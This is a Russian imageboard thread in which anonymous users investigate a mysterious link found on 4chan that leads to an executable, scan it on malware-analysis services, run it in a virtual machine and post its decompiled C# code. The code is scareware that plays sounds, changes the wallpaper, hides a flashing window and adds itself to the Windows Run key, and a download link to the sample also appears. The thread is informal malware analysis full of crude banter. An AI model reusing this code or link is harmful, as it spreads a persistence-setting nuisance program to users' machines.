Главная Настройка Mobile Контакты NSFW Каталог Пожертвования Купить пасскод Pics Adult Pics API Архив Реквест доски Каталог стикеров Реклама
Доски


[Ответить в тред] Ответить в тред

Check this out!

[Назад][Обновить тред][Вниз][Каталог] [ Автообновление ] 95 | 25 | 13
Назад Вниз Каталог Обновить

Аноним # OP  30/10/17 Пнд 13:18:17  163959779  
72322.png (2Кб, 700x468)
DL5
DL91
DL125
DL5821
DL25819
DL128129
DL1265732
DL56271229
DL671292922
DL2358219690
Hankclan.biz

Что это за говно? Нашел на 4chan в разделе /х/
Аноним # OP  30/10/17 Пнд 13:19:43  163959831
Hankclan.biz ==> http://hankclan.biz/52821993722572.html
Аноним # OP  30/10/17 Пнд 13:20:21  163959865
525.jpg (72Кб, 315x313)
Бумп неведомой хуйнёй
Аноним # OP  30/10/17 Пнд 13:23:02  163959989
Screenshot2017-[...].png (216Кб, 1080x1920)
>>163959831
> Для ленивых
Аноним 30/10/17 Пнд 13:23:11  163959999
>>163959831
Куда там нажимать ?
Аноним # OP  30/10/17 Пнд 13:24:02  163960039
>>163959999
Непонял, если ты про первую ссылку то там при копировании текста выделяются невидимые цифры
Аноним # OP  30/10/17 Пнд 13:25:01  163960091
>>163960039
И добавив к hankclan.biz/ эти цифры + .html покажется дьявол
Аноним 30/10/17 Пнд 13:25:45  163960136
Опять эти арг всякие
Аноним # OP  30/10/17 Пнд 13:26:56  163960196
>>163960091
НО при первом переходе мне показало какую-то загадку, я закрыл вкладку случайно зассал чего-то, а потом переходя по ссылке показался этот демон
Аноним 30/10/17 Пнд 13:27:33  163960237
15091756328700.jpg (106Кб, 1600x1200)
>>163960091
Страшна, вырубай
Аноним # OP  30/10/17 Пнд 13:27:46  163960248
>>163960136
Как что-то плохое перейди по ссылке , если покажется НЕ ДЕМОН, то скинь скрин в чат позязя :3
Аноним # OP  30/10/17 Пнд 13:28:30  163960285
>>163960237
Это что-то на CICADA 3310 похоже
Аноним 30/10/17 Пнд 13:28:42  163960294
image.png (24Кб, 1285x170)
я все правильно делаю?
Аноним # OP  30/10/17 Пнд 13:28:46  163960300
>>163960285
Похожее*
Аноним # OP  30/10/17 Пнд 13:29:36  163960340
>>163960294
Ты Иисус , а я походу даун
Аноним 30/10/17 Пнд 13:30:11  163960370
15093475983590.jpg (54Кб, 625x439)
вы все черти
Аноним 30/10/17 Пнд 13:30:51  163960399
>>163960285
>CICADA 3310
Что это ?
Аноним # OP  30/10/17 Пнд 13:31:53  163960451
>>163960399
Неужели гугол и википедия забанила?
Аноним 30/10/17 Пнд 13:32:52  163960496
15089282919240.jpg (86Кб, 576x568)
>>163960451
Я хочу чтобы ты мне рассказал
Аноним 30/10/17 Пнд 13:34:03  163960571
1.PNG (74Кб, 703x647)
http://hankclan.biz/52821993722571.html
Просто поменял одну цифру
Аноним # OP  30/10/17 Пнд 13:34:29  163960603
>>163960496
CICADA 3310 - это группа сектантов, которые вербуют к себе людей прошедших испытания-загадки
Аноним 30/10/17 Пнд 13:35:46  163960677
15090496342530.jpg (119Кб, 850x687)
>>163960571
Что там за файл ?
Аноним 30/10/17 Пнд 13:36:27  163960717
>>163960571
По ссылке какой то файл скачивается

ufile.io/a4lc7
Аноним 30/10/17 Пнд 13:36:32  163960722
15091261271900.png (461Кб, 600x774)
>>163960603
Спасибо !
Аноним 30/10/17 Пнд 13:37:01  163960746
Подпишсь на тред, аноны, гадайте, а результаты сюда. А я смотреть буду.
Аноним 30/10/17 Пнд 13:37:05  163960749
>>163960677
lord.exe весом в 26мб
Сейчас попробую чего-нибудь с ним сделать
Аноним 30/10/17 Пнд 13:37:53  163960793
15088389777560.png (23Кб, 200x235)
>>163960749
А ты смелый.
Аноним # OP  30/10/17 Пнд 13:38:31  163960832
>>163960749
Только со скринами плес
Аноним 30/10/17 Пнд 13:38:44  163960842
>>163959779 (OP)
Это идионфекция. Вы идионфецированы. ньбфаги не знают
Аноним # OP  30/10/17 Пнд 13:38:55  163960849
>>163960832
Я с телефона, не могу файл открыть
Аноним 30/10/17 Пнд 13:38:59  163960853
>>163960793
https://www.virustotal.com/#/file/77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653/detection
Вроде чисто,но имя файла показывает как 666.exe
Вместо lord.exe
Аноним 30/10/17 Пнд 13:40:05  163960903
>>163960832
Нужно ставить виртуалку,но мне очень лень
Аноним 30/10/17 Пнд 13:40:20  163960923
Screenshot2017-[...].png (162Кб, 1080x1920)
>>163960853
Нихуя не чисто.
Аноним # OP  30/10/17 Пнд 13:40:33  163960937
Screenshot2017-[...].png (177Кб, 1080x1920)
Аноним # OP  30/10/17 Пнд 13:41:12  163960982
15082226405850.jpg (23Кб, 480x360)
>>163960903
Поставь, будь няшей :3
Аноним 30/10/17 Пнд 13:41:36  163961000
>>163960923
Это ноунейм же антивирусы
Аноним 30/10/17 Пнд 13:41:51  163961013
>>163961000
Все равно подозрительно.
Аноним 30/10/17 Пнд 13:42:13  163961028
>>163960982
Тогда ждите,пока образ скачаю и саму vb
Аноним 30/10/17 Пнд 13:42:41  163961053
>>163961028
Не над, я уже.
Аноним 30/10/17 Пнд 13:43:33  163961102
>>163961053
Ну и шо тама ?
Аноним # OP  30/10/17 Пнд 13:43:36  163961105
>>163961013
> Название файла 666.ехе
> подозрительно
Аноним # OP  30/10/17 Пнд 13:43:56  163961121
>>163961053
Скрины в студию
Аноним 30/10/17 Пнд 13:44:06  163961128
>>163961102
Please wait while VxStream Sandbox v7.00 is processing your sample (SHA256: 77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653).
Once the analysis is completed you will be redirected automatically.
Аноним 30/10/17 Пнд 13:44:53  163961176
>>163961128
Там ещё на сайте логгер есть
http://scorecard.wspisp.net/logger.php
Аноним 30/10/17 Пнд 13:46:40  163961269
>>163959779 (OP)
Хуясе, вот это зашел на двачик мдо.
Аноним 30/10/17 Пнд 13:47:21  163961306
image.png (28Кб, 1170x354)
Висит
Аноним # OP  30/10/17 Пнд 13:47:57  163961339
>>163961269
Тебя сейчас рептилойды к себе завербуют, беги отсюда
Аноним # OP  30/10/17 Пнд 13:48:59  163961387
567e7469a0b02.jpg (36Кб, 600x470)
>>163961306
В треде есть психи, которые смогут это на комп поставить?
Аноним 30/10/17 Пнд 13:49:05  163961396
>>163961306
Кароч,если погуглить,то VxStream Sandbox это что-то типа rat'ника
Аноним # OP  30/10/17 Пнд 13:49:43  163961428
>>163961396
> Кароч,если погуглить,то VxStream Sandbox это что-то типа rat'ника
Для не просвященных поясни что это такое
Аноним 30/10/17 Пнд 13:49:47  163961432
>>163961396
This webpage is a free malware analysis service powered by Payload Security that detects and analyzes unknown threats using a unique Hybrid Analysis technology.
Аноним 30/10/17 Пнд 13:51:21  163961516
>>163961428
rat - удалённое управление компьютером
Там их много разновидностей,но суть такова
Кароч,я не думаю,что это что-то в духе цикады
Просто кто-то решил сыграть на любопытности людей
Аноним 30/10/17 Пнд 13:51:51  163961551
>>163961432
https://www.youtube.com/watch?v=lPhDtPa0QMg
Аноним # OP  30/10/17 Пнд 13:51:57  163961557
Screenshot2017-[...].png (174Кб, 1080x1920)
НЕ ТОНЕМ, РЕБЯТА, НЕ ТОНЕМ!
Аноним 30/10/17 Пнд 13:52:10  163961578
>>163961428
Ремоте Администратион Тул
Аноним 30/10/17 Пнд 13:52:54  163961624
15091660972951.png (5Кб, 740x586)
Ещё не вскрыли тему ?
Аноним 30/10/17 Пнд 13:52:55  163961628
https://www.hybrid-analysis.com/sample/77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653?environmentId=100
Аноним # OP  30/10/17 Пнд 13:53:14  163961643
>>163961516
>>163961578
Спасибо за пояснение :3
Аноним 30/10/17 Пнд 13:53:42  163961674
>>163961516
>Просто кто-то решил сыграть на любопытности людей
Возможно.
Но возможно так же, что это следующий ключ к разгадке квеста.
Аноним 30/10/17 Пнд 13:54:39  163961724
image.png (17Кб, 485x245)
Аноним 30/10/17 Пнд 13:55:30  163961769
>>163961387
Вряд ли. Если только на левое железо, которое под снос. Тут же все параноики.
Аноним 30/10/17 Пнд 13:55:35  163961773
>>163961674
С вирусней однозначно связано
Автоматизация чего-то там
Аноним 30/10/17 Пнд 13:55:39  163961778
image.png (1015Кб, 1023x616)
Скрин с виртуалки
Аноним # OP  30/10/17 Пнд 13:56:08  163961816
>>163961724
> VirusMy228
> 4chan /х/
Ничего удивительного
Аноним 30/10/17 Пнд 13:56:40  163961846
Сетевой трафик

172.217.16.142 443
TCP - United States
172.217.16.142 80
TCP - United States
172.217.16.132 80
TCP - United States
Аноним 30/10/17 Пнд 13:56:50  163961856
>>163961724
Ставим wireshark и смотрим куда запросы идут,анализируем и готово
Аноним # OP  30/10/17 Пнд 13:56:54  163961863
>>163961778
И ты жив ? не обосрался?
Аноним 30/10/17 Пнд 13:56:56  163961866
14738251722100.jpg (4004Кб, 300x300)
>>163961724
> 228
Аноним # OP  30/10/17 Пнд 13:57:28  163961902
>>163961846
Ip адресс дьявола?
Аноним 30/10/17 Пнд 13:57:58  163961930
228.png (161Кб, 1440x860)
Если хотите с деобфускацие поебаться, то продолжайте.
Аноним 30/10/17 Пнд 13:59:08  163961988
>>163961846
Мб он шлет запросы, пока не получит ответ?
Сколько он пакетов отослал уже?
И с какой переодичностью?
Аноним 30/10/17 Пнд 13:59:42  163962025
>>163961902
Вычислишь?
Аноним # OP  30/10/17 Пнд 14:00:15  163962056
>>163962025
Я не погромист
Аноним 30/10/17 Пнд 14:00:24  163962069
https://www.hybrid-analysis.com/sample/77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653?environmentId=100
Аноним 30/10/17 Пнд 14:00:52  163962090
>>163961846
>172.217.16.142 80
>TCP - United States
>172.217.16.132 80
>TCP - United States
По этим гугл находится
Аноним 30/10/17 Пнд 14:01:11  163962114
Информация об ip-адресе 172.217.16.142

#OrgName: Google LLC
Аноним # OP  30/10/17 Пнд 14:01:12  163962116
Screenshot2017-[...].png (136Кб, 1080x1920)
Screenshot2017-[...].png (189Кб, 1080x1920)
Screenshot2017-[...].png (222Кб, 1080x1920)
>>163961724
Блять, я думал ты прикалываешься
Аноним 30/10/17 Пнд 14:03:02  163962211
>>163962116
На C# накалякал какой-то школьник и пытается толкнуть
Аноним 30/10/17 Пнд 14:04:49  163962308
>>163961863
0Н УЖЕ С НАМИ
Аноним # OP  30/10/17 Пнд 14:07:06  163962433
Screenshot2017-[...].png (164Кб, 1080x1920)
На форчане потёрли тред
Аноним 30/10/17 Пнд 14:07:12  163962439
>>163962114
Корпорация добра?
Аноним 30/10/17 Пнд 14:08:55  163962511
2282.png (157Кб, 1440x860)
>>163961930
Почистил немного.
Аноним 30/10/17 Пнд 14:10:34  163962612
Ребята не стоит вскрывать эту тему. Вы молодые, шутливые, вам все легко. Это не то. Это не Чикатило и даже не архивы спецслужб. Сюда лучше не лезть. Серьезно, любой из вас будет жалеть. Лучше закройте тему и забудьте что тут писалось. Я вполне понимаю что данным сообщением вызову дополнительный интерес, но хочу сразу предостеречь пытливых - стоп. Остальные просто не найдут.
Аноним 30/10/17 Пнд 14:11:16  163962645
/°\
Аноним 30/10/17 Пнд 14:11:26  163962655
>>163962511
Как я и говорил.Школьник - быдлокодер толкает свой кривой вирус.Он даже не проверяет какая винда стоит,потому что в разных версиях - разные пути в реестре,для автозапуска.Даже стыдно немного за него
Аноним 30/10/17 Пнд 14:11:38  163962666
>>163962511
Короч вот весь код:
private void Form1_Load(object sender, EventArgs e)
{
Class3.Class2_0.Audio.Play(Class1.smethod_1(), AudioPlayMode.BackgroundLoop);
this.method_0(Class1.smethod_2());
this.Cursor = new Cursor(Class1.smethod_3().Handle);
Class3.Class2_0.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue(Application.ProductName, Application.ExecutablePath);
this.vmethod_0().Enabled = !this.vmethod_0().Enabled;
VBMath.Randomize();
int num = checked((int)Math.Round((double)Conversion.Int(99999f VBMath.Rnd() + 1f)));
Process process = new Process();
process.StartInfo.WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.System);
process.StartInfo.FileName = "taskmgr.exe";
process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
base.Focus();
process.StartInfo.WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.System);
process.StartInfo.FileName = "regedt32.exe";
process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
base.Focus();
}

[DebuggerStepThrough]
private void InitializeComponent()
{
this.icontainer_0 = new Container();
this.vmethod_1(new Timer(this.icontainer_0));
base.SuspendLayout();
this.vmethod_0().Interval = 200;
base.AutoScaleDimensions = new SizeF(6f, 13f);
base.AutoScaleMode = AutoScaleMode.Font;
base.ClientSize = new Size(212, 206);
base.ControlBox = false;
base.FormBorderStyle = FormBorderStyle.None;
base.Margin = new Padding(2);
base.Name = "Form1";
base.Opacity = 0.01;
base.ShowIcon = false;
base.ShowInTaskbar = false;
this.Text = "Explorer (isn't responding)";
base.WindowState = FormWindowState.Maximized;
base.ResumeLayout(false);
}

internal void method_0(Image image_0)
{
string str = Class3.Class2_0.FileSystem.CombinePath(Class3.Class2_0.FileSystem.SpecialDirectories.MyPictures, "c:\\wallpaper.bmp");
try
{
image_0.Save(str, ImageFormat.Bmp);
Form1.SystemParametersInfo(20, 0, ref str, 3);
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
Exception exception = exception1;
Interaction.MsgBox(string.Concat("There was an error setting the wallpaper: ", exception.Message), MsgBoxStyle.OkOnly, null);
ProjectData.ClearProjectError();
}
}

private void method_1(object sender, EventArgs e)
{
if (base.Opacity <= 0.05 | base.Opacity >= 0.65)
{
this.double_0 = -this.double_0;
}
base.Opacity = base.Opacity + this.double_0;
this.BackColor = Color.FromArgb(checked((int)Math.Round((double)(255f
VBMath.Rnd()))), 0, 0);
}

Ставим обоину и играем звуки. Ну и в автозагрузку прописываемся.
Аноним 30/10/17 Пнд 14:12:55  163962743
>>163962666
Ебаный демон
Аноним 30/10/17 Пнд 14:14:51  163962861
>>163962666
Ни тебе try catch.В ООП пацан не шарит,от слова "Совсем".Реализовал в ооп среде процедурный код,красавец
Аноним 30/10/17 Пнд 14:15:34  163962903
>>163962861
>VBMath.Rnd()
Я думаю тут и говорить не о чем.
Аноним 30/10/17 Пнд 14:16:42  163962979
>>163962903
Особенно имена "методов" доставили
method_0 и method_1
Это гениально
Аноним 30/10/17 Пнд 14:19:20  163963144
>>163962979
ООП ЖЕ ТАМ МЕТАДЫ РЕБЯТ Я ШАРЮ
Аноним 30/10/17 Пнд 14:44:21  163964520
>>163962979
Ты дебич? Это деобфускатор переименовал битые имена.
Аноним 30/10/17 Пнд 14:46:17  163964628
>>163964520
Тем не менее,это не отменяет того,что он криворукий
Аноним 30/10/17 Пнд 14:47:43  163964703
>>163964628
Он на vb.net писал, там все кривое.
Аноним # OP  30/10/17 Пнд 15:17:59  163966335
Киньте загадку от настоящей цикады чтоли
Аноним # OP  30/10/17 Пнд 15:19:01  163966381
>>163966335
Я просто хуй, сижу на паре и не могу искать

[Назад][Обновить тред][Вверх][Каталог] [Реквест разбана] [Подписаться на тред] [ ] 95 | 25 | 13
Назад Вверх Каталог Обновить

Топ тредов
Избранное